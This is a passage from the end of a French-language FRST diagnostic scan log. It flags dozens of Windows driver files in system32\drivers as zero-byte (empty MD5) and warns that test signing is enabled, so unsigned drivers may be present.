D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\serial.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sermouse.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sffdisk.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sffp_mmc.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sffp_sd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sfloppy.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sisraid2.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\sisraid4.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\smb.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\smclib.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\spldr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\spsys.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\srv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\srv2.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\srvnet.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\stexstor.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\storport.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\storvsc.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\stream.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\swenum.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tape.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tcpip.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tcpipreg.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tdi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tdpipe.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tdtcp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tdx.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\TeeDriverx64.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\termdd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\TMhardware.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tssecsrv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\TsUsbFlt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\TsUsbGD.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\tunnel.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\UAGP35.SYS -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\udfs.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ULIAGPKX.SYS -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\umbus.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\umpass.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usb8023.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\USBAUDIO.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\USBCAMD2.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbccgp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbcir.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbehci.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbhub.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbohci.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbport.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbprint.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbrpm.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\USBSTOR.SYS -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\usbuhci.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vdrvroot.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vga.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vgapnp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vhdmp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\viaide.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\videoprt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vmbus.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\VMBusHID.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\VMBusVideoM.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vms3cap.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vmstorfl.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\volmgr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\volmgrx.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\volsnap.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vsmraid.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vwifibus.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vwififlt.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\vwifimp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wacompen.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wanarp.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\watchdog.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\Wdf01000.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\WdfLdr.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wfplwf.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wimmount.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\winhv.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\winusb.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wmiacpi.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\wmilib.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\ws2ifsl.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\WUDFPf.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION C:\Windows\system32\drivers\WUDFRd.sys -> MD5 = D41D8CD98F00B204E9800998ECF8427E (0-byte MD5) <======= ATTENTION testsigning: ==> 'testsigning' est activé. Rechercher un éventuel pilote non signé <==== ATTENTION LastRegBack: 2017-12-29 22:50 ==================== Fin de FRST.txt ============================